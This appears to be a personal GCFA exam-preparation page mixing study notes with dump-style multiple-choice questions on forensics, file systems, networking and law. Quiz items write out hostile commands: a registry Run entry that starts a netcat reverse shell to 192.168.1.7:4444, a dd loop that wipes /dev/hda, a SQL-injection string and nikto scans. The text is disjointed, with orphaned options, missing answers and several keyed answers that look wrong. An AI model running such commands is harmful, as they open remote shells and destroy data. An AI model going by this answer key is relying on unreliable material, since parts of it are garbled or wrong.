Logo
RSS Feed

πŸ‘ˆπŸΌ Back to
GCFA

Sample Questions

Created: 18.11.2020
  1. List of tools
  2. List of reg entries
  3. List of known malware and ioc
  4. Terminology
  5. List of artefacts (Win and Lin)
  6. List of attacks
  7. List of scans and their footprint (try map against different OS and log the results)
  8. Re-read those diaries, might be of help
  9. Configure laboratory (Wins I have + WinXP + Linux Hacking + Linux Kali)
  10. Install WinServer VM with AD and learn the basics (Udemy course may be + Hahacking + questions)

❓ Which of the following encryption methods use the RC4 technology?

Dynamic & Static WEP, TKIP, but not CCMP.

#network #wifi #crypto #rc4

❓ Peter, an expert computer user, attached a new sound card to his computer. He then restarts the computer, so that the BIOS can scan the hardware changes. What will be the memory range of ROM that the BIOS scan for additional code to be executed for proper working of soundcard?

hC800 to hDF80

#bios #rom

❓Which of the following tools are used to determine the hop counts of an IP packet?

Ping, tracert.

#network #ping #tracert #hops

❓Which of the following file systems supports the hot fixing feature?

NTFS

#filesystem

❓ Every network device contains a unique built in Media Access Control (MAC) address, which is used to identify the authentic device to limit the network access. Which of the following addresses is a valid MAC address?

A3-07-B9-E3-BC-F9

#network #macaddress

❓ In a Windows computer, which of the following utilities is used to convert a FAT16 partition to FAT32?

CVT1.EXE

#filesystem

❓ Which of the following statements about SD cards are true?

  • It is used with mobile phones and digital cameras
  • It is a type of non-volatile memory card.

Not πŸ›‘!

  • It is used as RAM on client computers and servers.
  • It is a 184-pin memory module.

#filesystem

❓ Victor works as a professional Ethical Hacker for SecureNet Inc. He wants to use Steganographic file system method to encrypt and hide some secret information.

Hidden partition, unused sectors and slack space, but not dumb space.

#filesystem

❓Which of the following fsck commands will you use to check all filesystems listed in /etc/fstab?

fsck -A

#commands #fsck #filesystem

❓An organization wants to mitigate the risks associated with the lost or stolen laptops and the associated disclosure laws, while reporting data breaches. Which of the following solutions will be best for the organization?

Whole disk encryption, of course. Other answers and possible issues that they could address:

  • Hashing. Checks the integrity. We want to send these files, but we want to make sure they were not damaged or tampered in transit. #hashing
  • Trusted Platform Module. We have a strong password policy, but we store lots of information locally. We need this technology to secure authentication mechanism.
  • Digital signature. Authenticity control. We want our clients to be sure, that this data was sent by us.

❓Which of the following methods can be used to detect session hijacking attack?

A. nmap, B. Brutus, C. ntop, D. sniffer

❓ perl nikto.pl -h 192.168.0.1 -p 443 - port scanning

❓ Which of the following functionality within the Autopsy browser is specifically designed to aid in case management?

Image integrite

#hashing

❓ Use the mysql_real_escape_string() function for escaping input =β€˜or”=β€˜

❓ Access Windows resources from Linux

workstation - smbclient

❓he takes a steganography tool and hides the information in ASCII text by appending whitespace to the end of lines and encrypts thehidden information by using the IDEA encryption algorithm.

Image Hide, B. 2Mosaic, C. Snow.exe + D. Netcat

❓ countermeasure to a Shell Injection

escapeshellcmd(), escapeshellarg()

❓ Port scanning

nc -z

perl nikto.pl -h 192.168.0.1 -p 443

❓What does this command do: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe?

You want to set the Netcat to execute command any time. You want to put Netcat in the stealth mode, You want to add the Netcat command to the Windows registry.

❓ Firewalking

A. To use firewalking, the attacker needs the IP address of the last known gateway before the firewall and the IP address of a host located behind the firewall.

B. In this technique, an attacker sends a crafted packet with a TTL value that is set to expire one hop past the firewall.

C. A malicious attacker can use firewalking to determine the types of ports/protocols that can bypass the firewall.

❓ NAT spoofing

DNS cache poisoning, MAC spoofing, ARP spoofing

❓. Ping flood attack

B. Fraggle DoS attack

C. Teardrop attack

D. Smurf DoS attack

❓Piggybacking

B. Hacking

C. Session hijacking

D. Keystroke logging

Which of the following tools are used for footprinting? Each correct answer represents a complete solution. Choose all that apply.

  • A. Sam spade
  • B. Traceroute
  • C. Whois
  • D. Brutus

John works for an Internet Service Provider (ISP) in the United States. He discovered child pornography material on a Web site hosted by the ISP. John immediately informed law enforcement authorities about this issue. Under which of the following Acts is John bound to take such an action?

  • A. Civil Rights Act of 1991
  • B. PROTECT Act
  • C. Civil Rights Act of 1964
  • D. Sexual Predators Act

The MBR of a hard disk is a collection of boot records that contain disk information such as disk architecture, cluster size, and so on. The main work of the MBR is to locate and run necessary operating system files that are required to run a hard disk. In the context of the operating system, MBR is also known as the boot loader. Which of the following viruses can infect the MBR of a hard disk? Each correct answer represents a complete solution. Choose two.

  • A. Stealth
  • B. Boot sector
  • C. Multipartite
  • D. File

Which of the following file systems provides file-level security?

  • A. CDFS
  • B. FAT
  • C. FAT32
  • D. NTFS

Which of the following is a set of exclusive rights granted by a state to an inventor or his assignee for a fixed period of time in exchange for the disclosure of an invention?

  • A. Snooping
  • B. Copyright
  • C. Utility model
  • D. Patent

Fill in the blank with the appropriate name. __RFC 3227 __is a list, which specifies the order of volatility of data in a Windows based system.

  • A. RFC 3227

Which of the following file systems contains hardware settings of a Linux computer?

  • A. /var
  • B. /etc
  • C. /proc
  • D. /home

You work as a Network Administrator for Blue Bell Inc. You want to install Windows XP Professional on your computer, which already has Windows Me installed. You want to configure your computer to dual boot between Windows Me and Windows XP Professional. You have a single 40GB hard disk. Which of the following file systems will you choose to dual-boot between the two operating systems?

  • A. NTFS
  • B. FAT32
  • C. CDFS
  • D. FAT

Which of the following file systems cannot be used to install an operating system on the hard disk drive? Each correct answer represents a complete solution. Choose two.

  • A. Windows NT file system (NTFS)
  • B. High Performance File System (HPFS)
  • C. Log-structured file system (LFS)
  • D. Compact Disc File System (CDFS)
  • E. Novell Storage Services (NSS)

Nathan works as a Computer Hacking Forensic Investigator for SecureEnet Inc. He uses Visual TimeAnalyzer software to track all computer usage by logging into individual users account or specific projects and compile detailed accounts of time spent within each program. Which of the following functions are NOT performed by Visual TimeAnalyzer? Each correct answer represents a complete solution. Choose all that apply.

  • A. It monitors all user data such as passwords and personal documents.
  • B. It gives parents control over their children’s use of the personal computer.
  • C. It tracks work time, pauses, projects, costs, software, and internet usage.
  • D. It records specific keystrokes and run screen captures as a background process.

Which of the following evidences are the collection of facts that, when considered together, can be used to infer a conclusion about the malicious activity/person?

  • A. Corroborating
  • B. Circumstantial
  • C. Incontrovertible
  • D. Direct

Mark works as a security manager for SofTech Inc. He is using a technique for monitoring what the employees are doing with corporate resources. Which of the following techniques is being used by Mark to gather evidence of an ongoing computer crime if a member of the staff is e-mailing company’s secrets to an opponent?

  • A. Electronic surveillance
  • B. Civil investigation
  • C. Physical surveillance
  • D. Criminal investigation

❓ Peter works as a Technical Representative in a CSIRT for SecureEnet Inc. His team is called to investigate the computer of an employee, who is suspected for classified data theft. Suspect’s computer runs on Windows operating system. Peter wants to collect data and evidences for further analysis. He knows that in Windows operating system, the data is searched in pre-defined steps for proper and efficient analysis. Which of the following is the correct order for searching data on a Windows based system?

  • A. Volatile data, file slack, registry, memory dumps, file system, system state backup, internet traces
  • B. Volatile data, file slack, registry, system state backup, internet traces, file system, memory dumps
  • C. Volatile data, file slack, internet traces, registry, memory dumps, system state backup, file system
  • D. Volatile data, file slack, file system, registry, memory dumps, system state backup, internet traces

Peter works as a Computer Hacking Forensic Investigator. He has been called by an organization to conduct a seminar to give necessary information related to sexual harassment within the work place. Peter started with the definition and types of sexual harassment. He then wants to convey that it is important that records of the sexual harassment incidents should be maintained, which helps in further legal prosecution. Which of the following data should be recorded in this documentation? Each correct answer represents a complete solution. Choose all that apply.

  • A. Names of the victims
  • B. Date and time of incident
  • C. Nature of harassment
  • D. Location of each incident

Which of the following is a type of intruder detection that involves logging network events to a file for an administrator to review later?

  • A. Packet detection
  • B. Passive detection
  • C. Active detection
  • D. Event detection

In which of the following access control models can a user not grant permissions to other users to see a copy of an object marked as secret that he has received, unless they have the appropriate permissions?

  • A. Discretionary Access Control (DAC)
  • B. Access Control List (ACL)
  • C. Mandatory Access Control (MAC)
  • D. Role Based Access Control (RBAC)

You work as a Network Administrator for Web World Inc. You want to host an e-commerce Web site on your network. You want to ensure that storage of credit card information is secure. Which of the following conditions should be met to accomplish this? Each correct answer represents a complete solution. Choose all that apply.

  • A. NT authentication should be required for all customers before they provide their credit card numbers.
  • B. Strong encryption software should be used to store credit card information.
  • C. Only authorized access should be allowed to credit card information.
  • D. The NTFS file system should be implemented on a client computer.

Nathan works as a professional Ethical Hacker. He wants to see all open TCP/IP and UDP ports of his computer. Nathan uses the netstat command for this purpose but he is still unable to map open ports to the running process with PID, process name, and path. Which of the following commands will Nathan use to accomplish the task?

  • A. ping
  • B. Psloggedon
  • C. Pslist
  • D. fport

A firewall is a combination of hardware and software, used to provide security to a network. It is used to protect an internal network or intranet against unauthorized access from the Internet or other outside networks. It restricts inbound and outbound access and can analyze all traffic between an internal network and the Internet. Users can configure a firewall to pass or block packets from specific IP addresses and ports. Which of the following tools works as a firewall for the Linux 2.4 kernel?

  • A. OpenSSH
  • B. IPTables
  • C. IPChains
  • D. Stunnel

Adam works as a Computer Hacking Forensic Investigator for a garment company in the United States. A project has been assigned to him to investigate a case of a disloyal employee who is suspected of stealing design of the garments, which belongs to the company and selling those garments of the same design under different brand name. Adam investigated that the company does not have any policy related to the copy of design of the garments. He also investigated that the trademark under which the employee is selling the garments is almost identical to the original trademark of the company. On the grounds of which of the following laws can the employee be prosecuted?

  • A. Trademark law
  • B. Cyber law
  • C. Copyright law
  • D. Espionage law

You work as a Network Administrator for Perfect Solutions Inc. You install Windows 98 on a computer. By default, which of the following folders does Windows 98 setup use to keep the registry tools?

  • A. $SYSTEMROOT$REGISTRY
  • B. $SYSTEMROOT$WINDOWS
  • C. $SYSTEMROOT$WINDOWSREGISTRY
  • D. $SYSTEMROOT$WINDOWSSYSTEM32

Adam works as a Security Administrator for Umbrella Inc. He is responsible for securing all 15 servers of the company. To successfully accomplish the task, he enables the hardware and software firewalls and disables all unnecessary services on all the servers. Sales manager of the company asks Adam to run emulation software on one of the servers that requires the telnet service to function properly. Adam is concerned about the security of the server, as telnet can be a very large security risk in an organization. Adam decides to perform some footprinting, scanning, and penetration testing on the server to checkon the server to check the security. Adam telnets into the server and writes the following command:

HEAD / HTTP/1.0 - After pressing enter twice, Adam gets the following results:

img

Which of the following tasks has Adam just accomplished?

  • A. Poisoned the local DNS cache of the server.
  • B. Submitted a remote command to crash the server.
  • C. Grabbed the banner.
  • D. Downloaded a file to his local computer.

Adam works as a professional Computer Hacking Forensic Investigator. He has been assigned with the project of investigating an iPod, which is suspected to contain some explicit material. Adam wants to connect the compromised iPod to his system, which is running on Windows XP (SP2) operating system. He doubts that connecting the iPod with his computer may change some evidences and settings in the iPod. He wants to set the iPod to read-only mode. This can be done by changing the registry key within the Windows XP (SP2) operating system. Which of the following registry keys will Adam change to accomplish the task?

  • A. HKEY_LOCAL_MACHINE\System\CurrentControlset\Control\StorageDevicePolicies
  • B. HKEY_LOCAL_MACHINE\CurrentControlset\Control\StorageDevicePolicies
  • C. HKEY_LOCAL_MACHINE\System\CurrentControlset\StorageDevicePolicies
  • D. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

Which of the following is a name, symbol, or slogan with which a product is identified?

  • A. Trade secret
  • B. Patent
  • C. Copyright
  • D. Trademark

Adam works as an Incident Handler for Umbrella Inc. He is informed by the senior authorities that the server of the marketing department has been affected by a malicious hacking attack. Supervisors are also claiming that some sensitive data are also stolen. Adam immediately arrived to the server room of the marketing department and identified the event as an incident. He isolated the infected network from the remaining part of the network and started preparing to image the entire system. He captures volatile data, such as running process, ram, and network connections. Which of the following steps of the incident handling process is being performed by Adam?

  • A. Recovery
  • B. Eradication
  • C. Identification
  • D. Containment

You company suspects an employee of sending unauthorized emails to competitors. These emails are alleged to contain confidential company data. Which of the following is the most important step for you to take in preserving the chain of custody?

  • A. Preserve the email server including all logs.

  • B. Make copies of that employee’s email.

  • C. Seize the employee’s PC.

  • D. Place spyware on the employee’s PC to confirm these activities.

  • A. Session Hijacking

  • B. Bluesnarfing

  • C. PDA Hijacking

  • D. Privilege Escalation

You work as a Network Administrator for uCertify Inc. You want to edit the MSDOS.SYS file, in your computer, from the DOS prompt. You are unable to find the file. What is the most likely cause?

  • A. It is a read-only file.
  • B. It is a built-in command in the COMMAND.COM file.
  • C. Someone has deleted the file.
  • D. It is a hidden file.

Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him by the chief security officer of a cloth manufacturing company who suspects that one of the employees is selling the design of the clothes outside the company. The security officer asked Adam to investigate the iPhone of the employee, as he suspects that there might be some sensitive information stored in his iPhone. On investigation Adam found out that the employee tries to destroy the evidence on his iPhone. He presses and holds the Home and Power buttons until the device is forced into recovery mode. Which of the following actions occurred when iPhone is set into recovery mode?

  • A. iPhone will be prevented from booting temporarily.**
  • B. The file system will be destroyed.
  • C. Nothing will happen.
  • D. Data will be destroyed.

Sandra, a novice computer user, works on Windows environment. She experiences some problem regarding bad sectors formed in a hard disk of her computer. She wants to run CHKDSK command to check the hard disk for bad sectors and to fix the errors, if any, occurred. Which of the following switches will she use with CHKDSK command to accomplish the task?

  • A. CHKDSK /I
  • B. CHKDSK /C /L
  • C. CHKDSK /V /X
  • D. CHKDSK /R /F

Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate the BlackBerry, which is suspected to be used to hide some important information. Which of the following is the first step taken to preserve the information in forensic investigation of the BlackBerry?

  • A. Keep BlackBerry in ‘ON’ state.
  • B. Remove the storage media.
  • C. Eliminate the ability of the device to receive the push data.
  • D. Turn off the BlackBerry.

You are reviewing a Service Level Agreement between your company and a Web development vendor. Which of the following are security requirements you should look for in this SLA? Each correct answer represents a complete solution. Choose all that apply.

  • A. Time to respond to bug reports
  • B. Encryption standards
  • C. Security Monitoring
  • D. Guarantees on known security flaws

Mark works as a Network Administrator for Net Perfect Inc. The company has a Linux- based network. Mark installs a Checkpoint Firewall NGX on a SecurePlatform device. He performs a scheduled backup of his system settings and products configuration. Where are these backup files stored? Each correct answer represents a complete solution. Choose all that apply.

  • A. SCP
  • B. TFTP
  • C. Locally on the SecurePlatform machine hard drive
  • D. On a PC in a file named userC

Which of the following tools can be used by a user to hide his identity? Each correct answer represents a complete solution. Choose all that apply.

  • A. Proxy server
  • B. Anonymizer
  • C. Rootkit
  • D. IPchains
  • E. War dialer

Which of the following file systems is designed by Sun Microsystems?

  • A. NTFS
  • B. CIFS
  • C. ext2
  • D. ZFS

Which of the following standard file formats is used by Apple’s iPod to store contact information?

  • A. HFS+
  • B. hCard
  • C. vCard
  • D. FAT32

Which of the following is the correct order of digital investigations Standard Operating Procedure (SOP)?

  • A. Initial analysis, request for service, data collection, data analysis, data reporting
  • B. Initial analysis, request for service, data collection, data reporting, data analysis
  • C. Request for service, initial analysis, data collection, data reporting, data analysis
  • D. Request for service, initial analysis, data collection, data analysis, data reporting

Which of the following types of computers is used for attracting potential intruders?

  • A. Bastion host
  • B. Data pot
  • C. Files pot
  • D. Honey pot

John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He receives the following e-mail:

img

The e-mail that John has received is an example of __________.

  • A. Virus hoaxes
  • B. Spambots
  • C. Social engineering attacks
  • D. Chain letters

You work as a Network Administrator for Peach Tree Inc. The company currently has a FAT-based Windows NT network. All client computers run Windows 98. The management wants all client computers to be able to boot in Windows XP Professional. You want to accomplish the following goals: The file system should support file compression and file level security. All the existing data and files can be used by the new file system. Users should be able to dual-boot their computers. You take the following steps to accomplish these goals: Convert the FAT file system to NTFS using the CONVERT utility. Install Windows XP and choose to upgrade the existing operating system during setup. Which of the following goals will you be able to accomplish? Each correct answer represents a complete solution. Choose all that apply.

  • A. The file system supports file compression and file level security.
  • B. All the existing data and files can be used by the new file system.
  • C. Users are able to dual-boot their computers. Why not?
  • D. None of the goals are accomplished.

Maria works as a professional Ethical Hacker. She recently got a project to test the security of www.we-are-secure.com. Arrange the three pre-test phases of the attack to test the security of weare-secure.

img

Footprinting -> Id actie -> Enum -> Session -> Web hacking -> backdoor

Which of the following tools can be used to perform a whois query? Each correct answer represents a complete solution. Choose all that apply.

  • A. Sam Spade
  • B. SuperScan
  • C. Traceroute
  • D. WsPingPro

Which of the following IP addresses are private addresses? Each correct answer represents a complete solution. Choose all that apply.

  • A. 19.3.22.17
  • B. 192.168.15.2
  • C. 192.166.54.32
  • D. 10.0.0.3

You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to fix partitions on a hard drive. Which of the following Unix commands can you use to accomplish the task?

  • A. fdformat
  • B. exportfs
  • C. fsck
  • D. fdisk

Which of the following Acts enacted in United States allows the FBI to issue National Security Letters (NSLs) to Internet service providers (ISPs) ordering them to disclose records about their customers?

  • A. Wiretap Act
  • B. Computer Fraud and Abuse Act
  • C. Economic Espionage Act of 1996
  • D. Electronic Communications Privacy Act of 1986

John works as a professional Ethical Hacker. He is assigned a project to test the security of www.weare-secure.com. He is working on the Linux operating system. He wants to sniff the we-are-secure network and intercept a conversation between two employees of the company through session hijacking. Which of the following tools will John use to accomplish the task?

  • A. Ethercap
  • B. Tripwire
  • C. Hunt
  • D. IPChains

Which of the following switches of the XCOPY command copies attributes while copying files?

  • A. /o
  • B. /p
  • C. /k
  • D. /s**

Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate the main server of SecureEnet Inc. The server runs on Debian Linux operating system. Adam wants to investigate and review the GRUB configuration file of the server system. Which of the following files will Adam investigate to accomplish the task?

  • A. /boot/grub/menu.lst
  • B. /boot/grub/grub.conf
  • C. /boot/boot.conf
  • D. /grub/grub.com

You are working with a team that will be bringing in new computers to a sales department at a company. The sales team would like to keep not only their old files, but system settings as well on the new PC’s. What should you do?

  • A. Use the Disk Management tool to move everything to the new computer.
  • B. Copy the files and the Windows Registry to a removable media then copy it onto the new machines.
  • C. Do a system backup (complete) on each old machine, then restore it onto the new machines
  • D. Use the User State Migration tool to move the system settings and files to the new machines.

You work as a Network Administrator for Net World International. You have configured the hard disk drive of your computer as shown in the image below:

img

The computer is configured to dual-boot with Windows 2000 Server and Windows 98. While working on Windows 2000 Server, you save a file on the 6GB partition. You are unable to find the file while working on Windows 98. You are not even able to access the partition on which the file is saved. What is the most likely cause?

  • A. The file is corrupt.
  • B. The 6GB partition is corrupt.
  • C. Windows 98 does not support the NTFS file system.
  • D. Files saved in Windows 98 are not supported by Windows 2000.

Answer : C

Question 51 ( Topic 1 )

Which of the following is the process of overwriting all addressable locations on a disk?

  • A. Drive wiping
  • B. Spoofing
  • C. Sanitization
  • D. Authentication

Answer : A

Next Question

Question 52 ( Topic 1 )

Adam works as a professional Computer Hacking Forensic Investigator with the local police of his area. A project has been assigned to him to investigate a PDA seized from a local drug dealer. It is expected that many valuable and important information are stored in this

  • A. Identification, Collection, Examination, Documentation
  • B. Examination, Collection, Identification, Documentation
  • C. Documentation, Examination, Identification, Collection
  • D. Examination, Identification, Collection, Documentation

Answer : D

Next Question

Question 53 ( Topic 1 )

Which of the following prevents malicious programs from attacking a system?

  • A. Anti-virus program
  • B. Smart cards
  • C. Biometric devices
  • D. Firewall

Answer : A

Next Question

Question 54 ( Topic 1 )

Adam works as a professional Computer Hacking Forensic Investigator. He works with the local police. A project has been assigned to him to investigate an iPod, which was seized from a student of the high school. It is suspected that the explicit child pornography contents are stored in the iPod. Adam wants to investigate the iPod extensively. Which of the following operating systems will Adam use to carry out his investigations in more extensive and elaborate manner?

  • A. Linux
  • B. MINIX 3
  • C. Windows XP
  • D. Mac OS

Answer : D

Next Question

Question 55 ( Topic 1 )

Which of the following directories in Linux operating system contains device files, which refers to physical devices?

  • A. /boot
  • B. /etc
  • C. /dev
  • D. /bin

Answer : C

Question 56 ( Topic 1 )

Identify the port in the image given below, which can be connected to the hub to extend the number of ports, and up to 127 devices can be connected to it?

img

Answer :

img

Next Question

Question 57 ( Topic 1 )

You work as a Web developer for ABC Inc. You want to investigate the Cross-Site Scripting attack on your company’s Web site. Which of the following methods of investigation can you use to accomplish the task? Each correct answer represents a complete solution. Choose all that apply.

  • A. Review the source of any HTML-formatted e-mail messages for embedded scripts or links in the URL to the company’s site.
  • B. Look at the Web server’s logs and normal traffic logging.
  • C. Use Wireshark to capture traffic going to the server and then searching for the requests going to the input page, which may give log of the malicious traffic and the IP address of the source.
  • D. Use a Web proxy to view the Web server transactions in real time and investigate any communication with outside servers.

Answer : A,B,D

Next Question

Question 58 ( Topic 1 )

Which of the following directories cannot be placed out of the root filesystem? Each correct answer represents a complete solution. Choose all that apply.

  • A. /sbin
  • B. /etc
  • C. /var
  • D. /lib

Answer : A,B,D

Next Question

Question 59 ( Topic 1 )

You work as a Network Security Analyzer. You got a suspicious email while working on a forensic project. Now, you want to know the IP address of the sender so that you can analyze various information such as the actual location, domain information, operating system being used, contact information, etc. of the email sender with the help of various tools and resources. You also want to check whether this email is fake or real. You know that analysis of email headers is a good starting point in such cases. The email header of the suspicious email is given below:

img

What is the IP address of the sender of this email?

  • A. 172.16.10.90
  • B. 209.191.91.180
  • C. 216.168.54.25
  • D. 141.1.1.1

Answer : C

Next Question

Question 60 ( Topic 1 )

The incident response team has turned the evidence over to the forensic team. Now, it is the time to begin looking for the ways to improve the incident response process for next time. What are the typical areas for improvement? Each correct answer represents a complete solution. Choose all that apply.

  • A. Information dissemination policy
  • B. Additional personnel security controls
  • C. Incident response plan
  • D. Electronic monitoring statement

Answer : A,B,C,D

Question 61 ( Topic 1 )

Mark is the Administrator of a Linux computer. He wants to check the status of failed Telnet-based login attempts on the Linux computer. Which of the following shell commands will he use to accomplish the task?

  • A. GREP
  • B. CP
  • C. FSCK
  • D. CAT

Answer : A

Next Question

Question 62 ( Topic 1 )

Which of the following modules of OS X kernel (XNU) provides the primary system program interface?

  • A. BSD
  • B. LIBKERN
  • C. I/O Toolkit
  • D. Mach

Answer : A

Next Question

Question 63 ( Topic 1 )

You work as a professional Computer Hacking Forensic Investigator for DataEnet Inc. You want to investigate e-mail information of an employee of the company. The suspected employee is using an online e-mail system such as Hotmail or Yahoo. Which of the following folders on the local computer will you review to accomplish the task? Each correct answer represents a complete solution. Choose all that apply.

  • A. History folder
  • B. Temporary Internet Folder
  • C. Download folder
  • D. Cookies folder

Answer : A,B,D

Next Question

Question 64 ( Topic 1 )

Adam, a malicious hacker has successfully gained unauthorized access to the Linux system of Umbrella Inc. Web server of the company runs on Apache. He has downloaded sensitive documents and database files from the computer. After performing these malicious tasks, Adam finally runs the following command on the Linux command box before disconnecting. for (( i = 0;i<11;i++ )); do dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda done Which of the following actions does Adam want to perform by the above command?

  • A. Making a bit stream copy of the entire hard disk for later download.
  • B. Deleting all log files present on the system.
  • C. Wiping the contents of the hard disk with zeros.
  • D. Infecting the hard disk with polymorphic virus strings.

Answer : C

Next Question

Question 65 ( Topic 1 )

Adam works as a professional Computer Hacking Forensic Investigator. He has been called by the FBI to examine data of the hard disk, which is seized from the house of a suspected terrorist. Adam decided to acquire an image of the suspected hard drive. He uses a forensic hardware tool, which is capable of capturing data from IDE, Serial ATA, SCSI devices, and flash cards. This tool can also produce MD5 and CRC32 hash while capturing the data. Which of the following tools is Adam using?

  • A. Wipe MASSter
  • B. ImageMASSter 4002i
  • C. ImageMASSter Solo-3
  • D. FireWire DriveDock

Answer : C

Question 66 ( Topic 1 )

Which of the following attacks saturates network resources and disrupts services to a specific computer?

  • A. Teardrop attack
  • B. Polymorphic shell code attack
  • C. Denial-of-Service (DoS) attack
  • D. Replay attack

Answer : C

Next Question

Question 67 ( Topic 1 )

Which of the following is the process of comparing cryptographic hash functions of system executables and configuration files?

  • A. Spoofing
  • B. File integrity auditing
  • C. Reconnaissance
  • D. Shoulder surfing

Answer : B

Next Question

Question 68 ( Topic 1 )

Which of the following is the initiative of United States Department of Justice, which provides state and local law enforcement agencies the tools to prevent Internet crimes against children, and catches the distributors of child pornography on the Internet?

  • A. Innocent Images National Initiative (IINI)
  • B. Internet Crimes Against Children (ICAC)
  • C. Project Safe Childhood (PSC)
  • D. Anti-Child Porn.org (ACPO)

Answer : B

Next Question

Question 69 ( Topic 1 )

TCP FIN scanning is a type of stealth scanning through which the attacker sends a FIN packet to the target port. If the port is closed, the victim assumes that this packet was sent mistakenly by the attacker and sends the RST packet to the attacker. If the port is open, the FIN packet will be ignored and the port will drop the packet. Which of the following operating systems can be easily identified with the help of TCP FIN scanning?

  • A. Solaris
  • B. Red Hat
  • C. Knoppix
  • D. Windows

Answer : D

Next Question

Question 70 ( Topic 1 )

Which of the following is a file management tool?

  • A. Defrag
  • B. MSCONFIG
  • C. Device Manager
  • D. Windows Explorer

Answer : D

Question 71 ( Topic 1 )

Normally, RAM is used for temporary storage of data. But sometimes RAM data is stored in the hard disk, what is this method called?

  • A. Cache memory
  • B. Static memory
  • C. Virtual memory
  • D. Volatile memory

Answer : C

Next Question

Question 72 ( Topic 1 )

Which of the following file systems supports the hot fixing feature?

  • A. FAT16
  • B. exFAT
  • C. FAT32
  • D. NTFS

Answer : D

Next Question

Question 73 ( Topic 1 )

Which of the following type of file systems is not supported by Linux kernel?

  • A. vFAT
  • B. NTFS
  • C. HFS
  • D. FAT32

Answer : D

Next Question

Question 74 ( Topic 1 )

Which of the following is a correct sequence of different layers of Open System Interconnection (OSI) model?

  • A. Physical layer, data link layer, network layer, transport layer, presentation layer, session layer, and application layer
  • B. application layer, presentation layer, network layer, transport layer, session layer, data link layer, and physical layer
  • C. Physical layer, data link layer, network layer, transport layer, session layer, presentation layer, and application layer
  • D. Physical layer, network layer, transport layer, data link layer, session layer, presentation layer, and application layer

Answer : C

Next Question

Question 75 ( Topic 1 )

By gaining full control of router, hackers often acquire full control of the network. Which of the following methods are commonly used to attack Routers? Each correct answer represents a complete solution. Choose all that apply.

  • A. By launching Social Engineering attack
  • B. By launching Max Age attack
  • C. Route table poisoning
  • D. By launching Sequence++ attack

Answer : B,C,D